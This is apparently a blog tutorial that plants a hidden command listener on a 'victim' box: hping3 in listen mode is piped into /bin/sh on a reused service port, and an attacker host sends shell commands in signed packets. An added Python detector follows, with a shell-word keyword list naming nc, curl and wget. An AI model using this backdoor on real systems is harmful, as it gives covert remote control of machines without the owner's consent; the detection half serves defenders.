Friday, November 1, 2013

Create a hidden command listener by reusing an open port

Scenario:
- Box A - victim, running a network service on port 8834. We'll reuse this port.
- Box B - attacker host behind NAT. It will transmit commands to the listener waiting on the victim.

This is similar to a reverse shell from box A to box B, except that B will need another way to view results of the commands executed on A.

A:
$ sudo hping3 --listen SecretSignature -I vboxnet0 -p 8834 | /bin/sh

--listen - Listen mode. Waits for packets containing the signature and dumps the data from the signature to the end of the packet
-I - interface to listen on
-p - listening port

This will intercept packets on the port and dump the content that follows a matching signature. Because the output is piped into /bin/sh, those bytes are executed as commands. Another trick would be needed to view the output of the commands, though.

B:
$ sudo hping3 --count 1 --data 200 --file commands.txt --sign SecretSignature 192.168.56.1 -V -p 8834

--count 1 - stop after sending 1 packet
--data 200 - set packet body size in bytes
--file - fill the packet body with data from the file
--sign - prefix the packet body with the given signature
-V - verbose
-p - destination port

$ cat commands.txt
echo 123 > hacked.txt
whoami > log.txt
uname -a >> log.txt
pwd >> log.txt
ls -al >> log.txt
ifconfig -a >> log.txt

(Keep a newline at the end of the file, otherwise the last command is not executed!)
Verify on the victim machine A that the commands have been executed and their results saved in the corresponding files.
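From the defender's side, the two halves of this setup leave distinct traces: on the wire, a packet to the service port whose body is not the protocol the port normally speaks but a signature glued to newline-separated shell commands; on the host, an hping3 process in --listen mode. The script below is an added illustration (not code from the original post) of cheap heuristics for both. The sample payloads and ps-style lines are constructed for the demo, the SHELL_WORDS seed list is an assumption to be extended per environment, and the protocol check only recognises a TLS record header or an HTTP request line.

```python
"""Detection heuristics for the hping3 --listen / --sign command channel.

Added illustration, not code from the original post. Two cheap checks:
  1. network side: a TCP payload to a port that should speak a known protocol,
     but which carries newline-separated shell-looking text (a signature glued
     to the first command, then one command per line), is suspicious;
  2. host side: an hping3 process in --listen mode is itself the listener and
     is worth an alert on a box that has no business running it.
The sample payloads and process lines at the bottom are constructed for this demo.
"""
import re

# Seed list of utilities that commonly appear in such command files
# (assumption: extend to match your environment).
SHELL_WORDS = {
    "echo", "whoami", "uname", "pwd", "ls", "ifconfig", "id", "cat",
    "wget", "curl", "nc", "bash", "sh", "chmod", "rm",
}
REDIRECT_RE = re.compile(r"(>>?|\|)")            # output redirection or pipe
LISTEN_RE = re.compile(r"\bhping3?\b.*--listen\b")  # hping in listen mode


def looks_like_known_protocol(payload: bytes) -> bool:
    """Rough check: TLS record header or an HTTP request line at offset 0."""
    if len(payload) >= 3 and payload[0] == 0x16 and payload[1] == 0x03:
        return True
    return payload.startswith((b"GET ", b"POST ", b"HEAD ", b"PUT ", b"OPTIONS "))


def shell_like_lines(payload: bytes) -> list:
    """Return the lines in the payload that look like shell commands."""
    text = payload.decode("ascii", errors="replace")
    hits = []
    for raw in text.splitlines():
        line = raw.strip("\x00 \t\r")  # drop NUL/space padding of fixed-size bodies
        if not line:
            continue
        first = line.split()[0]
        # The first line is "<signature><command>", so its command word is hidden
        # inside the signature; a redirect or pipe still gives it away.
        if first in SHELL_WORDS or REDIRECT_RE.search(line):
            hits.append(line)
    return hits


def classify_payload(dst_port: int, service_ports: set, payload: bytes,
                     min_lines: int = 2) -> str:
    """'alert', 'ok' or 'ignore' for one TCP segment's payload."""
    if dst_port not in service_ports:
        return "ignore"
    if looks_like_known_protocol(payload):
        return "ok"
    return "alert" if len(shell_like_lines(payload)) >= min_lines else "ok"


def is_hping_listener(cmdline: str) -> bool:
    """True for a process command line running hping in listen mode.

    A shell pipeline shows up in ps as two separate processes, so the
    '| /bin/sh' part is not visible in the hping3 line itself; confirm it via
    the parent/child relation or the process's stdout file descriptor.
    """
    return bool(LISTEN_RE.search(cmdline))


# ---- constructed sample data ------------------------------------------------
SERVICE_PORTS = {8834}
# 200-byte body: signature glued to the first command, then NUL padding.
CMD_BODY = (b"SecretSignature"
            b"echo 123 > hacked.txt\nwhoami > log.txt\nuname -a >> log.txt\n")
CMD_PAYLOAD = CMD_BODY.ljust(200, b"\x00")
TLS_HELLO = bytes.fromhex("160301") + b"\x00\x05" + b"\x01\x00\x00\x01\x00"
HTTP_REQ = b"GET / HTTP/1.1\r\nHost: service\r\n\r\n"

PS_LINES = [
    "root  4242  sudo hping3 --listen SecretSignature -I vboxnet0 -p 8834",
    "root  4243  /bin/sh",
    "svc   1100  /opt/svc/bin/svcd",
]

if __name__ == "__main__":
    for name, p in (("command body", CMD_PAYLOAD), ("tls", TLS_HELLO), ("http", HTTP_REQ)):
        print(f"{name:13s} -> {classify_payload(8834, SERVICE_PORTS, p)}")
    for line in PS_LINES:
        if is_hping_listener(line):
            print("listener process:", line)
```

The network check deliberately keys on the port's expected protocol rather than on the signature, which the defender does not know; the host check is the more reliable of the two, since hping3 in listen mode has to run as root on the victim and is easy to spot in process or audit logs.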